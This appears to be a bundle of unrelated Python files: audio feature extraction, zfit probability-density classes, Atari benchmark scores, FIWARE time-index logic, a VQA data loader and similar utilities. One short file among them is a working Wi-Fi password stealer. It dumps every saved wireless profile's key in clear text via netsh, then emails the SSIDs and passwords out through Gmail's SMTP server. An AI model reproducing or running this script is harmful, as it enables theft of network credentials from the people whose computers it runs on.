# finally return the features in a concatenated array (as a vector)
return np.concatenate((Mean, Std), axis=0).reshape(1, -1)
def get_period(signal, signal_sr):
"""Extract the period from the the provided signal
:param signal: the signal to extract the period from
:type signal: numpy.ndarray
:param signal_sr: the sampling rate of the input signal
:type signal_sr: integer
:return: a vector containing the signal period
:rtype: numpy.ndarray
"""
# perform a sanity check
if signal is None:
raise ValueError("Input signal cannot be None")
# transform the signal to the hilbert space
hy = hilbert(signal)
ey = np.sqrt(signal ** 2 + hy ** 2)
min_time = 1.0 / signal_sr
tot_time = len(ey) * min_time
pow_ft = np.abs(fft(ey))
peak_freq = pow_ft[3: int(len(pow_ft) / 2)]
peak_freq_pos = peak_freq.argmax()
peak_freq_val = 2 * pi * (peak_freq_pos + 2) / tot_time
period = 2 * pi / peak_freq_val
return np.array([period])
def extract_signal_features(signal, signal_sr):
"""Extract part of handcrafted features from the input signal.
:param signal: the signal the extract features from
:type signal: numpy.ndarray
:param signal_sr: the sample rate of the signal
:type signal_sr: integer
:return: the populated feature vector
:rtype: numpy.ndarray
"""
# normalise the sound signal before processing
signal = signal / np.max(np.abs(signal))
signal = np.nan_to_num(signal)
# trim the signal to the appropriate length
trimmed_signal, idc = librosa.effects.trim(signal, frame_length=FRAME_LEN, hop_length=HOP)
# extract the signal duration
signal_duration = librosa.get_duration(y=trimmed_signal, sr=signal_sr)
# use librosa to track the beats
tempo, beats = librosa.beat.beat_track(y=trimmed_signal, sr=signal_sr)
# find the onset strength of the trimmed signal
o_env = librosa.onset.onset_strength(trimmed_signal, sr=signal_sr)
# find the frames of the onset
onset_frames = librosa.onset.onset_detect(onset_envelope=o_env, sr=signal_sr)
# keep only the first onset frame
onsets = onset_frames.shape[0]
# decompose the signal into its magnitude and the phase components such that signal = mag * phase
mag, phase = librosa.magphase(librosa.stft(trimmed_signal, n_fft=FRAME_LEN, hop_length=HOP))
# extract the rms from the magnitude component
rms = librosa.feature.rms(y=trimmed_signal)[0]
# extract the spectral centroid of the magnitude
cent = librosa.feature.spectral_centroid(S=mag)[0]
# extract the spectral rolloff point from the magnitude
rolloff = librosa.feature.spectral_rolloff(S=mag, sr=signal_sr)[0]
# extract the zero crossing rate from the trimmed signal using the predefined frame and hop lengths
zcr = librosa.feature.zero_crossing_rate(trimmed_signal, frame_length=FRAME_LEN, hop_length=HOP)[0]
# pack the extracted features into the feature vector to be returned
signal_features = np.concatenate(
(
np.array([signal_duration, tempo, onsets]),
get_period(signal, signal_sr=signal_sr),
sta_fun(rms),
sta_fun(cent),
sta_fun(rolloff),
sta_fun(zcr),
),
axis=0,
)
# finally, return the gathered features and the trimmed signal
return signal_features, trimmed_signal
def extract_mfcc(signal, signal_sr=SR, n_fft=FRAME_LEN, hop_length=HOP, n_mfcc=MFCC_dim):
"""Extracts the Mel-frequency cepstral coefficients (MFCC) from the provided signal
:param signal: the signal to extract the mfcc from
:type signal: numpy.ndarray
:param signal_sr: the signal sample rate
:type signal_sr: integer
:param n_fft: the fft window size
:type n_fft: integer
:param hop_length: the hop length
:type hop_length: integer
:param n_mfcc: the dimension of the mfcc
:type n_mfcc: integer
:return: the populated feature vector
:rtype: numpy.ndarray
"""
# compute the mfcc of the input signal
mfcc = librosa.feature.mfcc(
y=signal, sr=signal_sr, n_fft=n_fft, hop_length=hop_length, n_mfcc=n_mfcc, dct_type=3
)
# extract the first and second order deltas from the retrieved mfcc's
mfcc_delta = librosa.feature.delta(mfcc, order=1, mode='nearest')
mfcc_delta2 = librosa.feature.delta(mfcc, order=2, mode='nearest')
# create the mfcc array
mfccs = []
# populate it using the extracted features
for i in range(n_mfcc):
mfccs.extend(sta_fun(mfcc[i, :]))
for i in range(n_mfcc):
mfccs.extend(sta_fun(mfcc_delta[i, :]))
for i in range(n_mfcc):
mfccs.extend(sta_fun(mfcc_delta2[i, :]))
# finally return the coefficients
return mfccs
def extract_features_hc(signal, signal_sr):
"""Extract hancrafted features from the input signal.
:param signal: the signal the extract features from
:type signal: numpy.ndarray
:param signal_sr: the sample rate of the signal
:type signal_sr: integer
:return: the extracted feature vector
:rtype: numpy.ndarray
"""
# extract the signal features
signal_features, trimmed_signal = extract_signal_features(signal, signal_sr)
# extract the mfcc's from the trimmed signal and get the statistical feature.
mfccs = extract_mfcc(trimmed_signal)
return np.concatenate((signal_features, mfccs), axis=0)
def extract_sound_features(metadata, audio_dataset_path):
"""Extract all sound features (handcrafted + VGG) from the input signal
:param metadata: the metadata dataframe with audio links
:type metadata: pandas dataframe
:param audio_dataset_path: path to the audio folder
:type audio_dataset_path: string
:return: the extracted feature vector
:rtype: numpy.ndarray
"""
import vggish_input
import vggish_params
import vggish_slim
with tf.Graph().as_default(), tf.Session() as sess:
# load pre-trained vggish model
vggish_slim.define_vggish_slim()
vggish_slim.load_vggish_slim_checkpoint(sess, checkpoint_path)
features_tensor = sess.graph.get_tensor_by_name(vggish_params.INPUT_TENSOR_NAME)
embedding_tensor = sess.graph.get_tensor_by_name(
vggish_params.OUTPUT_TENSOR_NAME
)
sound_features = []
# loop through the dataset using information from the metadata file
for index_num, row in tqdm(metadata.iterrows()):
# get the file path
file_name = os.path.join(os.path.abspath(audio_dataset_path),str(row['file_path']))
# extract basic sound data
audio, sample_rate = librosa.load(file_name, sr=SR, mono=True, offset=0.0, duration=None)
# extract vgg features
yt, index = librosa.effects.trim(audio, frame_length=FRAME_LEN, hop_length=HOP)
input_batch = vggish_input.waveform_to_examples(yt, SR_VGG)
[features_vgg] = sess.run(
[embedding_tensor], feed_dict={features_tensor: input_batch}
)
features_vgg = sta_fun_2(features_vgg)
features_vgg = features_vgg.reshape(features_vgg.shape[-1],)
# extract hc features
audio, sample_rate = librosa.load(file_name, res_type='kaiser_fast')
features_hc = extract_features_hc(audio, sample_rate)
# concat features
features = np.concatenate((features_hc, features_vgg), axis=0)
sound_features.append(features)
return sound_features
def extract_metadata_features(metadata, encoder_path):
"""Extract all metadata features
:param metadata: the metadata dataframe with audio links
:type metadata: pandas dataframe
:param encoder_path: path to the saved one hot encoder
:type encoder_path: string
:return: the extracted feature vector
:rtype: numpy.ndarray
"""
# process age column
mean_age = metadata['subject_age'].mean()
metadata['subject_age'] = metadata['subject_age'].fillna(mean_age)
# process gender column
with open(encoder_path, 'rb') as f:
encoder = pickle.load(f)
x_gender = encoder.transform(np.array(metadata['subject_gender']).reshape(-1, 1)).toarray()
x_gender = np.delete(x_gender, -1, 1)
metadata_features = np.concatenate([x_gender, np.array(metadata['subject_age']).reshape(-1,1)], axis=1)
return metadata_features
|
144248
|
import subprocess, re, smtplib
def send_mail(email, message):
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
sender_email = "<EMAIL>"
password = "<PASSWORD>"
server.login(sender_email, password)
server.sendmail(sender_email, email, message)
server.quit()
command = "netsh wlan show profiles"
networks = str(subprocess.check_output(command, shell=True))
network_names_list = re.findall("(?:Profile\s*:\s)(.*)", networks)
lis = network_names_list[0].split("\\r\\n")
network_names = []
for i in lis:
if ":" in i:
index = i.index(":")
network_names.append(i[index + 2 :])
else:
network_names.append(i)
result = ""
curr_result = ""
for i in network_names:
command = "netsh wlan show profiles " + i + " key = clear"
try:
curr_result = subprocess.check_output(command, shell=True)
result = result + str(curr_result)
except:
pass
result = result.split("\\r\\n")
content = ""
for i in result:
if "SSID name" in i:
content += i + " "
if "Key Content" in i:
content += i + "\n\n"
email = input('enter your email:')
send_mail(email, content)
|
144279
|
from __future__ import annotations
# Copyright (c) 2021 zfit
import typing
from collections.abc import Callable
from contextlib import suppress
import tensorflow_probability as tfp
import zfit_interface.typing as ztyping
from zfit_interface.pdf import ZfitPDF
from zfit_interface.variables import ZfitVar, ZfitSpace, ZfitParam
from zfit import convert_to_parameter, z
from zfit._variables.varsupport import VarSupports
from zfit.core.func import Func
from zfit.core.values import ValueHolder
from zfit.util.container import convert_to_container
from zfit.util.exception import (
SpecificFunctionNotImplemented,
NotExtendedPDFError, WorkInProgressError,
)
class Integration:
_analytic_integrals = {}
def __init__(self, mc_sampler=None, draws_per_dim=None, numeric_integrator=None):
self._analytic_integrals = self._analytic_integrals.copy()
if mc_sampler is None:
mc_sampler = lambda *args, **kwargs: tfp.mcmc.sample_halton_sequence(
*args, randomized=False, **kwargs
)
if numeric_integrator is None:
numeric_integrator = False # TODO
if draws_per_dim is None:
draws_per_dim = 40_000
self.numeric_integrator = numeric_integrator
self.mc_sampler = mc_sampler
self.draws_per_dim = draws_per_dim
def register_on_object(
self, var: ztyping.Variable, func: Callable, overwrite: bool = False
):
var = convert_to_container(var, frozenset)
if var in self._analytic_integrals and not overwrite:
raise ValueError(
f"An analytic integral for {var} is already registered and 'overwrite' is "
f"set to False."
)
self._analytic_integrals[var] = func
def get_available(self, var):
var = convert_to_container(var, frozenset)
candidates = sorted(
(v for v in self._analytic_integrals if var.issubset(v)), key=len
)
return {v: self._analytic_integrals[v] for v in candidates}
@property
def has_full(self, var):
var = convert_to_container(var, frozenset)
return len(list(self.get_available(var).keys()) + [[]][0]) == len(var)
def has_partial(self, var):
var = convert_to_container(var, frozenset)
return bool(self.get_available(var))
class PDF(Func, ZfitPDF):
def __init__(
self,
obs: typing.Mapping[str, ZfitSpace] = None,
params: typing.Mapping[str, ZfitParam] = None,
var: typing.Mapping[str, ZfitVar] = None,
supports: typing.Mapping[str, typing.Mapping[str, VarSupports]] = None,
extended: bool = None,
norm: typing.Mapping[str, ZfitSpace] = None,
label: str | None = None,
):
self.supports = supports
if norm is None:
norm = obs.values() # TODO: preprocess
super().__init__(var=var, label=label)
if norm is None:
norm = self.space
self.norm = norm
if extended is not None:
self._set_yield(extended)
self.integration = Integration()
def _set_yield(self, value):
# if self.is_extended:
# raise AlreadyExtendedPDFError(f"Cannot extend {self}, is already extended.")
value = convert_to_parameter(value)
# self.add_cache_deps(value) # TODO
self._yield = value
@property
def is_extended(self) -> bool:
"""Flag to tell whether the model is extended or not.
Returns:
A boolean.
"""
return self._yield is not None
def __call__(self, var):
if self.is_extended:
return self.ext_pdf(var)
else:
return self.pdf(var)
def _pdf(self, var, norm):
raise SpecificFunctionNotImplemented
def pdf(
self,
var: ztyping.VarInputType,
norm: ztyping.NormInputType = None,
*,
options=None,
) -> ztyping.PDFReturnType:
"""Probability density function, normalized over `norm`.
Args:
var: `float` or `double` `Tensor`.
norm: :py:class:`~zfit.Space` to normalize over
Returns:
:py:class:`tf.Tensor` of type `self.dtype`.
"""
var = self._convert_check_input_var(var)
norm = self._convert_check_input_norm(norm, var=var)
if var.space is not None:
return self.integrate(limits=var, norm=norm, options=options)
value = self._call_pdf(var=var, norm=norm, options=options)
return value
# with self._convert_sort_x(var) as var:
# value = self._single_hook_pdf(x=var, norm_range=norm)
# if run.numeric_checks:
# z.check_numerics(value, message="Check if pdf output contains any NaNs of Infs")
# return z.to_real(value)
@z.function(wraps="model")
def _call_pdf(self, var, norm, *, options=None):
return self._pdf(var, norm) # TODO
def _ext_pdf(self, var, norm):
raise SpecificFunctionNotImplemented
def ext_pdf(
self,
var: ztyping.VarInputType,
norm: ztyping.NormInputType = None,
*,
options=None,
) -> ztyping.PDFReturnType:
"""Probability density function, normalized over `norm`.OneDim.
Args:
var: `float` or `double` `Tensor`.
norm: :py:class:`~zfit.Space` to normalize over
Returns:
:py:class:`tf.Tensor` of type `self.dtype`.
"""
if not self.is_extended:
raise NotExtendedPDFError
var = self._convert_check_input_var(var)
norm = self._convert_check_input_norm(norm, var=var)
if var.space is not None:
return self.integrate(limits=var, norm=norm, options=options)
return self._call_ext_pdf(var=var, norm=norm, options=options)
@z.function(wraps="model")
def _call_ext_pdf(self, var, norm, *, options=None):
return self._ext_pdf(var, norm) # TODO
def _integrate(self, var, norm, options):
raise SpecificFunctionNotImplemented
def integrate(self, limits, norm=None, *, var=None, options=None):
var = self._convert_check_input_var(limits, var)
if var.space is None:
raise ValueError(
f"No space is given to integrate of {self}, needs at least one."
)
norm = self._convert_check_input_norm(norm, var=var)
return self._call_integrate(var=var, norm=norm, options=options)
@z.function(wraps="model")
def _call_integrate(self, var, norm, options):
with suppress(SpecificFunctionNotImplemented):
return self._auto_integrate(var, norm, options=options)
if self.is_extended:
return (
self._auto_ext_integrate(var, norm, options=options) / self.get_yield()
)
return self._fallback_integrate(var, norm, options=options)
def _auto_integrate(self, var, norm, options):
with suppress(SpecificFunctionNotImplemented):
return self._integrate(var, norm, options=options)
return self._fallback_integrate(var=var, norm=norm, options=options)
def _fallback_integrate(self, var, norm, options):
pass
def _ext_integrate(self, var, norm, options):
raise SpecificFunctionNotImplemented
def _values(self, var=None, options=None):
if self.is_extended:
return self.rel_counts(var=var, options=options)
else:
return self.counts(var=var, options=options)
def counts(self, *, var=None, norm=None, options=None):
return self._call_counts(var=var, norm=norm, options=options)
def _call_counts(self, var=None, norm=None, options=None):
with suppress(SpecificFunctionNotImplemented):
return self._counts(var, norm, options=options) # TODO: auto_value?
return self._call_ext_pdf(var=var, norm=norm, options=options)
def _counts(self, var=None, norm=None, options=None):
raise SpecificFunctionNotImplemented
def rel_counts(self, *, var=None, norm=None, options=None):
return self._call_rel_counts(var=var, norm=norm, options=options)
def _call_rel_counts(self, var=None, norm=None, options=None):
with suppress(SpecificFunctionNotImplemented):
return self._rel_counts(var, norm, options=options) # TODO: auto_value?
return self._fallback_rel_counts(var=var, norm=norm, options=options)
def _rel_counts(self, var=None, norm=None, options=None):
raise SpecificFunctionNotImplemented
def _fallback_rel_counts(self, var, norm, options):
raise WorkInProgressError
def ext_integrate(self, limits, norm=None, *, var=None, options=None):
if not self.is_extended:
raise NotExtendedPDFError
var = self._convert_check_input_var(limits, var)
if var.space is None:
raise ValueError(
f"No space is given to integrate of {self}, needs at least one."
)
norm = self._convert_check_input_norm(norm, var=var)
return self._call_ext_integrate(var=var, norm=norm, options=options)
@z.function(wraps="model")
def _call_ext_integrate(self, var, norm, options):
with suppress(SpecificFunctionNotImplemented):
return self._auto_ext_integrate(var, norm, options=options)
if self.is_extended:
return self._auto_integrate(var, norm, options=options) * self.get_yield()
return self._fallback_ext_integrate(var, norm, options=options)
def _auto_ext_integrate(self, var, norm, options):
return self._ext_integrate(var, norm, options=options)
def _fallback_ext_integrate(self, var, norm, options):
pass # TODO
# return self.integration.mixed(var, norm, options)
def _convert_check_input_var(self, var):
var = ValueHolder(var)
return var # TODO
def _convert_check_input_norm(self, norm, var):
if norm is None:
norm = self.norm
# return var # TODO
class UnbinnedPDF(PDF):
def __init__(self, obs, params=None, var=None, supports=None, extended=None, norm=None):
supports_default = 'ext_pdf' if extended else 'pdf'
if supports is None:
supports = {}
if supports_default not in supports:
supports[supports_default] = {}
if obs is None:
obs_supports = {}
else:
obs_supports = {
axis: VarSupports(var=ob.name, data=True)
for axis, ob in obs.items()
if not isinstance(ob, VarSupports)
}
if params is None:
params_supports = {}
else:
params_supports = {
axis: VarSupports(var=p.name, scalar=True) for axis, p in params.items()
}
if var is None:
var_supports = {}
else:
var_supports = var.copy()
var_supports.update(obs_supports)
var_supports.update(params_supports)
if supports_default not in supports:
supports[supports_default] = var_supports
super().__init__(obs=obs, params=params, var=var, supports=supports, extended=extended, norm=norm)
class HistPDF(PDF):
def __init__(
self,
obs: typing.Mapping[str, ZfitSpace] = None,
params: typing.Mapping[str, ZfitParam] = None,
var: typing.Mapping[str, ZfitVar] = None,
supports: typing.Mapping[str, typing.Mapping[str, VarSupports]] = None,
extended: bool = None,
norm: typing.Mapping[str, ZfitSpace] = None,
label: str | None = None,
):
supports_default = 'counts' if extended else 'rel_counts'
if supports is None:
supports = {}
if supports_default not in supports:
supports[supports_default] = {}
if obs is None:
obs_supports = {}
else:
obs_supports = {
axis: VarSupports(var=ob.name, binned=True)
for axis, ob in obs.items()
if not isinstance(ob, VarSupports)
}
if params is None:
params_supports = {}
else:
params_supports = {
axis: VarSupports(var=p.name, scalar=True) for axis, p in params.items()
}
if var is None:
var_supports = {}
else:
var_supports = var.copy()
var_supports.update(obs_supports)
var_supports.update(params_supports)
supports[supports_default] = var_supports
if 'pdf' not in supports:
supports['pdf'] = {axis: VarSupports(var=v.var, full=True)
for axis, v in supports[supports_default].items()}
if 'ext_pdf' not in supports:
supports['ext_pdf'] = {axis: VarSupports(var=v.var, full=True)
for axis, v in supports[supports_default].items()}
super().__init__(
obs=obs, params=params, var=var, extended=extended, norm=norm, label=label, supports=supports,
)
def _ext_pdf(self, var, norm): # TODO: normalization?
counts = self._call_counts(var=var, norm=norm)
binareas = var.binned.binning.areas
densities = counts / binareas
return densities
def _pdf(self, var, norm): # TODO: normalization?
counts = self._call_rel_counts(var=var, norm=norm)
binareas = var.binned.binning.areas
densities = counts / binareas
return densities
|
144299
|
def pytest_addoption(parser):
# Where to find curl-impersonate's binaries
parser.addoption("--install-dir", action="store", default="/usr/local")
parser.addoption("--capture-interface", action="store", default="eth0")
|
144349
|
from .application_pb2 import *
from .application_pb2_grpc import *
from .device_pb2 import *
from .device_pb2_grpc import *
from .deviceProfile_pb2_grpc import *
from .deviceProfile_pb2 import*
from .deviceQueue_pb2_grpc import *
from .deviceQueue_pb2 import*
from .frameLog_pb2_grpc import *
from .frameLog_pb2 import*
from .fuotaDeployment_pb2_grpc import *
from .fuotaDeployment_pb2 import*
from .gateway_pb2_grpc import *
from .gateway_pb2 import*
from .gatewayProfile_pb2_grpc import *
from .gatewayProfile_pb2 import*
from .internal_pb2_grpc import *
from .internal_pb2 import*
from .multicastGroup_pb2_grpc import *
from .multicastGroup_pb2 import*
from .networkServer_pb2_grpc import *
from .networkServer_pb2 import*
from .organization_pb2_grpc import *
from .organization_pb2 import*
from .profiles_pb2_grpc import *
from .profiles_pb2 import*
from .serviceProfile_pb2_grpc import *
from .serviceProfile_pb2 import*
from .user_pb2_grpc import *
from .user_pb2 import*
|
144363
|
entries = [
{
'env-title': 'atari-alien',
'env-variant': 'No-op start',
'score': 3166,
},
{
'env-title': 'atari-amidar',
'env-variant': 'No-op start',
'score': 1735,
},
{
'env-title': 'atari-assault',
'env-variant': 'No-op start',
'score': 7203,
},
{
'env-title': 'atari-asterix',
'env-variant': 'No-op start',
'score': 406211,
},
{
'env-title': 'atari-asteroids',
'env-variant': 'No-op start',
'score': 1516,
},
{
'env-title': 'atari-atlantis',
'env-variant': 'No-op start',
'score': 841075,
},
{
'env-title': 'atari-bank-heist',
'env-variant': 'No-op start',
'score': 976,
},
{
'env-title': 'atari-battle-zone',
'env-variant': 'No-op start',
'score': 28742,
},
{
'env-title': 'atari-beam-rider',
'env-variant': 'No-op start',
'score': 14074,
},
{
'env-title': 'atari-berzerk',
'env-variant': 'No-op start',
'score': 1645,
},
{
'env-title': 'atari-bowling',
'env-variant': 'No-op start',
'score': 81.8,
},
{
'env-title': 'atari-boxing',
'env-variant': 'No-op start',
'score': 97.8,
},
{
'env-title': 'atari-breakout',
'env-variant': 'No-op start',
'score': 748,
},
{
'env-title': 'atari-centipede',
'env-variant': 'No-op start',
'score': 9646,
},
{
'env-title': 'atari-chopper-command',
'env-variant': 'No-op start',
'score': 15600,
},
{
'env-title': 'atari-crazy-climber',
'env-variant': 'No-op start',
'score': 179877,
},
{
'env-title': 'atari-defender',
'env-variant': 'No-op start',
'score': 47092,
},
{
'env-title': 'atari-demon-attack',
'env-variant': 'No-op start',
'score': 130955,
},
{
'env-title': 'atari-double-dunk',
'env-variant': 'No-op start',
'score': 2.5,
},
{
'env-title': 'atari-enduro',
'env-variant': 'No-op start',
'score': 3454,
},
{
'env-title': 'atari-fishing-derby',
'env-variant': 'No-op start',
'score': 8.9,
},
{
'env-title': 'atari-freeway',
'env-variant': 'No-op start',
'score': 33.9,
},
{
'env-title': 'atari-frostbite',
'env-variant': 'No-op start',
'score': 3965,
},
{
'env-title': 'atari-gopher',
'env-variant': 'No-op start',
'score': 33641,
},
{
'env-title': 'atari-gravitar',
'env-variant': 'No-op start',
'score': 440,
},
{
'env-title': 'atari-hero',
'env-variant': 'No-op start',
'score': 38874,
},
{
'env-title': 'atari-ice-hockey',
'env-variant': 'No-op start',
'score': -3.5,
},
{
'env-title': 'atari-jamesbond',
'env-variant': 'No-op start',
'score': 1909,
},
{
'env-title': 'atari-kangaroo',
'env-variant': 'No-op start',
'score': 12853,
},
{
'env-title': 'atari-krull',
'env-variant': 'No-op start',
'score': 9735,
},
{
'env-title': 'atari-kung-fu-master',
'env-variant': 'No-op start',
'score': 48192,
},
{
'env-title': 'atari-montezuma-revenge',
'env-variant': 'No-op start',
'score': 0.0,
},
{
'env-title': 'atari-ms-pacman',
'env-variant': 'No-op start',
'score': 3415,
},
{
'env-title': 'atari-name-this-game',
'env-variant': 'No-op start',
'score': 12542,
},
{
'env-title': 'atari-phoenix',
'env-variant': 'No-op start',
'score': 17490,
},
{
'env-title': 'atari-pitfall',
'env-variant': 'No-op start',
'score': 0.0,
},
{
'env-title': 'atari-pong',
'env-variant': 'No-op start',
'score': 20.9,
},
{
'env-title': 'atari-private-eye',
'env-variant': 'No-op start',
'score': 15095,
},
{
'env-title': 'atari-qbert',
'env-variant': 'No-op start',
'score': 23784,
},
{
'env-title': 'atari-riverraid',
'env-variant': 'No-op start',
'score': 17322,
},
{
'env-title': 'atari-road-runner',
'env-variant': 'No-op start',
'score': 55839,
},
{
'env-title': 'atari-robotank',
'env-variant': 'No-op start',
'score': 52.3,
},
{
'env-title': 'atari-seaquest',
'env-variant': 'No-op start',
'score': 266434,
},
{
'env-title': 'atari-skiing',
'env-variant': 'No-op start',
'score': -13901,
},
{
'env-title': 'atari-solaris',
'env-variant': 'No-op start',
'score': 8342,
},
{
'env-title': 'atari-space-invaders',
'env-variant': 'No-op start',
'score': 5747,
},
{
'env-title': 'atari-star-gunner',
'env-variant': 'No-op start',
'score': 49095,
},
{
'env-title': 'atari-surround',
'env-variant': 'No-op start',
'score': 6.8,
},
{
'env-title': 'atari-tennis',
'env-variant': 'No-op start',
'score': 23.1,
},
{
'env-title': 'atari-time-pilot',
'env-variant': 'No-op start',
'score': 8329,
},
{
'env-title': 'atari-tutankham',
'env-variant': 'No-op start',
'score': 280,
},
{
'env-title': 'atari-up-n-down',
'env-variant': 'No-op start',
'score': 15612,
},
{
'env-title': 'atari-venture',
'env-variant': 'No-op start',
'score': 1520,
},
{
'env-title': 'atari-video-pinball',
'env-variant': 'No-op start',
'score': 949604,
},
{
'env-title': 'atari-wizard-of-wor',
'env-variant': 'No-op start',
'score': 9300,
},
{
'env-title': 'atari-yars-revenge',
'env-variant': 'No-op start',
'score': 35050,
},
{
'env-title': 'atari-zaxxon',
'env-variant': 'No-op start',
'score': 10513,
},
]
|
144364
|
from datetime import datetime
from typing import Iterable, Union
from utils.common import iter_entity_attrs
from utils.jsondict import maybe_value, maybe_string_match
from utils.timestr import latest_from_str_rep, to_datetime
TIME_INDEX_HEADER_NAME = 'Fiware-TimeIndex-Attribute'
MaybeString = Union[str, None]
def _first_not_none(xs: Iterable):
ys = [x for x in xs if x is not None]
return ys[0]
# NB this function is always called with a sequence containing at least one
# value != None.
def _attribute(notification: dict, attr_name: str) -> MaybeString:
return maybe_value(notification, attr_name, 'value')
def _attribute_key_values(notification: dict, attr_name: str) -> MaybeString:
return maybe_value(notification, attr_name)
def _meta_attribute(notification: dict, attr_name: str, meta_name: str) \
-> MaybeString:
return maybe_value(notification,
attr_name, 'metadata', meta_name, 'value')
def _json_ld_meta_attribute(
notification: dict,
attr_name: str,
meta_name: str) -> MaybeString:
return maybe_value(notification,
attr_name, meta_name)
def _iter_metadata(
notification: dict,
meta_name: str) -> Iterable[MaybeString]:
for attr_name in iter_entity_attrs(notification):
yield _meta_attribute(notification, attr_name, meta_name)
def _iter_json_ld_metadata(
notification: dict,
meta_name: str) -> Iterable[MaybeString]:
for attr_name in iter_entity_attrs(notification):
yield _json_ld_meta_attribute(notification, attr_name, meta_name)
def time_index_priority_list(
custom_index: str,
notification: dict) -> datetime:
"""
Returns the next possible time_index value using the strategy described in
the function select_time_index_value.
"""
# Custom time index attribute
yield to_datetime(_attribute(notification, custom_index))
# The most recent custom time index metadata
yield latest_from_str_rep(_iter_metadata(notification, custom_index))
# TimeInstant attribute
yield to_datetime(_attribute(notification, "TimeInstant"))
# The most recent TimeInstant metadata
yield latest_from_str_rep(_iter_metadata(notification, "TimeInstant"))
# timestamp attribute
yield to_datetime(_attribute(notification, "timestamp"))
# The most recent timestamp metadata
yield latest_from_str_rep(_iter_metadata(notification, "timestamp"))
# The most recent observedAt json-ld metadata
yield latest_from_str_rep(_iter_json_ld_metadata(notification, "observedAt"))
# The most recent modifiedAt json-ld metadata
yield latest_from_str_rep(_iter_json_ld_metadata(notification, "modifiedAt"))
# observedAt attribute
yield to_datetime(_attribute_key_values(notification, "observedAt"))
# modifiedAt attribute
yield to_datetime(_attribute_key_values(notification, "modifiedAt"))
# dateModified attribute
yield to_datetime(_attribute(notification, "dateModified"))
# The most recent dateModified metadata
yield latest_from_str_rep(_iter_metadata(notification, "dateModified"))
def select_time_index_value(custom_index: str, notification: dict) -> datetime:
"""
Determine which attribute or metadata value to use as a time index for the
entity being notified.
The returned value will be the first value found in the below list that can
be converted to a ``datetime``. Items are considered from top to bottom,
so that if multiple values are present and they can all be converted to
``datetime``, the topmost value is chosen.
- Custom time index. The value of the ``TIME_INDEX_HEADER_NAME``. Note
that for a notification to contain such header, the corresponding
subscription has to be created with an ``httpCustom`` block as detailed
in the *Subscriptions* and *Custom Notifications* sections of the NGSI
spec.
- Custom time index metadata. The most recent custom time index attribute
value found in any of the attribute metadata sections in the notification
- ``TimeInstant`` attribute.
- ``TimeInstant`` metadata. The most recent ``TimeInstant`` attribute value
found in any of the attribute metadata sections in the notification.
- ``timestamp`` attribute.
- ``timestamp`` metadata. The most recent ``timestamp`` attribute value
found in any of the attribute metadata sections in the notification.
- ``dateModified`` attribute.
- ``dateModified`` metadata. The most recent ``dateModified`` attribute
value found in any of the attribute metadata sections in the notification.
- Current time. This is the default value we use if any of the above isn't
present or none of the values found can actually be converted to a
``datetime``.
:param custom_index: name of the custom_index (if requested,
None otherwise)
:param notification: the notification JSON payload as received from Orion.
:return: the value to be used as time index.
"""
current_time = datetime.now()
for index_candidate in time_index_priority_list(
custom_index, notification):
if index_candidate:
return index_candidate
# use the current time as a last resort
return current_time
def select_time_index_value_as_iso(custom_index: str, notification: dict) -> \
str:
"""
Same as ``select_time_index_value`` but formats the returned ``datetime``
as an ISO 8601 string.
"""
return select_time_index_value(custom_index, notification).isoformat()
|
144373
|
import numpy as np
from wrappa import WrappaObject, WrappaImage
class DSModel:
def __init__(self, **kwargs):
pass
def predict(self, data, **kwargs):
_ = kwargs
# Data is always an array of WrappaObjects
responses = []
for obj in data:
img = obj.image.as_ndarray
rotated_img = np.rot90(img)
resp = WrappaObject(WrappaImage.init_from_ndarray(
payload=rotated_img,
ext=obj.image.ext,
))
responses.append(resp)
return responses
def predict_180(self, data, **kwargs):
_ = kwargs
# Data is always an array of WrappaObjects
responses = []
for obj in data:
img = obj.image.as_ndarray
rotated_img = np.rot90(img)
rotated_img = np.rot90(rotated_img)
resp = WrappaObject(WrappaImage.init_from_ndarray(
payload=rotated_img,
ext=obj.image.ext,
))
responses.append(resp)
return responses
|
144376
|
import chex
from .restarter import RestartWrapper
from .termination import spread_criterion
class Simple_Restarter(RestartWrapper):
def __init__(
self,
base_strategy,
stop_criteria=[spread_criterion],
):
"""Simple Restart Strategy - Only reinitialize the state."""
super().__init__(base_strategy, stop_criteria)
@property
def restart_params(self) -> chex.ArrayTree:
"""Return default parameters for strategy restarting."""
re_params = {"min_num_gens": 50, "min_fitness_spread": 0.1}
return re_params
def restart_strategy(
self,
rng: chex.PRNGKey,
state: chex.ArrayTree,
params: chex.ArrayTree,
) -> chex.ArrayTree:
"""Simple restart by state initialization."""
new_state = self.base_strategy.initialize(rng, params)
return new_state
|
144389
|
from pytasking.wrappers import *
from pytasking.utilities import *
from pytasking.manager import *
name = "pytasking"
|
144402
|
import torch.utils.data as data
import os,sys
import numpy as np
import pickle
sys.path.insert(0, '../')
def default_loader(path):
return pickle.load(open(path, 'rb'))
def parse_data(data, cur_num_boxes, w, h, num_boxes):
features, boxes, attn_target, use, objs, atts, att_use = [], [], [], [], [], [], []
for i in range(cur_num_boxes):
cb, cf, co, ca = data['boxes'][i], data['features'][i], [], []
features.append(np.asarray(cf))
boxes.append(np.asarray([cb[0]*1.0/w, cb[1]*1.0/h, cb[2]*1.0/w, cb[3]*1.0/h, ((cb[2]-cb[0])*(cb[3]-cb[1])*1.0)/(w*h)]))
pad_len = num_boxes - cur_num_boxes
for i in range(pad_len):
features.append(np.asarray([0.0]*2048))
boxes.append(np.asarray([0.0]*5))
return features, boxes
class MSCOCOvqa(data.Dataset):
def __init__(self, data, path, w2i, num_boxes=36, q_len=14, loader=default_loader):
self.data = data
self.path = path
self.loader = loader
self.max_len = q_len
self.a_vocab_size = len(w2i[0])
self.q_vocab_size = len(w2i[1])
self.num_boxes = num_boxes
def __getitem__(self, index):
cur_data = self.data[index]
img_id = cur_data['image_id']
question = cur_data['question'][:self.max_len]
question_id = -1
if cur_data.has_key('question_id'):
question_id = cur_data['question_id']
pad_len = max(0, self.max_len-len(question))
question = question + [self.q_vocab_size]*pad_len
answers = cur_data['answers']
data_path = os.path.join(self.path, str(img_id)+'.pkl')
try:
data = self.loader(data_path)
except:
print('error in loading pkl from ' + str(data_path))
exit(-1)
cur_num_boxes = data['num_boxes']
w = data['image_w']
h = data['image_h']
features, boxes = parse_data(data, cur_num_boxes, w, h, self.num_boxes)
label = np.zeros(self.a_vocab_size)
for ans in answers:
w, c = ans
label[w] = float(c)
return np.asarray(features, dtype=np.float32), np.asarray(boxes, dtype=np.float32), np.asarray(question), \
label, question_id, data_path
def __len__(self):
return len(self.data)
